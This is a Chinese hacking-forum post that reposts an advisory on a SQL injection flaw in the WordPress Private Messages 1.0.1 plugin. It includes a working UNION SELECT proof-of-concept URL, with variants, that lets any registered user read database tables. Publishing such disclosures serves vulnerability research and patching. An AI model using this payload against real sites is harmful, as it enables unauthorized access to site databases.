查看: 13573|回复: 1

Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

[复制链接]
发表于 2016-12-20 23:18:49 | 显示全部楼层 |阅读模式
[PHP] 纯文本查看 复制代码
1 - Description:
 
Type user access: registered user.  
$_GET[‘id’] is not escaped. Url is accessible for every registered user.
 
 
2 - Proof of Concept:
 
1 – Login as regular user (created using wp-login.php?action=register):
 
2 -Using :
 
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
 
Obs: Use id number of your user in third column after word select. For example:
 
…UNION+SELECT+1,2,1,name,slug…
 
…UNION+SELECT+1,2,2,name,slug…
 
…UNION+SELECT+1,2,3,name,slug…
 
…UNION+SELECT+1,2,4,name,slug…
 
…UNION+SELECT+1,2,5,name,slug…
回复

使用道具 举报

发表于 2016-12-21 21:27:19 | 显示全部楼层
666666   
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 06:10 , Processed in 0.114389 second(s), 22 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部